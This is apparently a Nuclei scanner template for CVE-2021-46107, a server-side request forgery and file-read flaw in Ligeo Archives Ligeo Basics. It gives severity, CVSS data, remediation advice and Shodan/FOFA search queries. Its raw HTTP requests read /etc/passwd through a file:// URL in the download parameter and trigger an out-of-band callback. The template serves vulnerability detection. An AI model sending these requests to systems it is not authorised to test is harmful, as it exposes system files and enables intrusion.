nuclei-templates/http/cves/2021/CVE-2021-46107.yaml

51 lines
1.8 KiB
YAML
Raw Normal View History

2023-08-31 19:49:52 +00:00
id: CVE-2021-46107
info:
name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
author: ritikchaddha
severity: high
description: |
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability.
2023-08-31 19:49:52 +00:00
reference:
- https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-46107
2023-10-14 11:27:55 +00:00
- https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/
2023-08-31 19:49:52 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-46107
2023-08-31 19:49:52 +00:00
cwe-id: CWE-918
epss-score: 0.01739
epss-percentile: 0.86486
2023-10-14 11:27:55 +00:00
cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:*
2023-08-31 19:49:52 +00:00
metadata:
2023-09-06 12:09:01 +00:00
verified: true
max-request: 3
2023-10-14 11:27:55 +00:00
vendor: ligeo-archives
product: ligeo_basics
shodan-query: title:"Ligeo"
2023-09-06 12:09:01 +00:00
fofa-query: title="Ligeo"
2023-08-31 19:49:52 +00:00
tags: cve,cve2021,ligeo,ssrf,lfr
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /archive/download?file=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
- "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
# digest: 4b0a00483046022100b9b110f79fbbfb38e4a7889c68505659b0e34dd1036bf3d2e8572d8646938d17022100ddd3133ae7f7acc2934f2efca6e7d8642bacc3968585b4ff07265c0d04eadd04:922c64590222798bb761d5b6d8e72950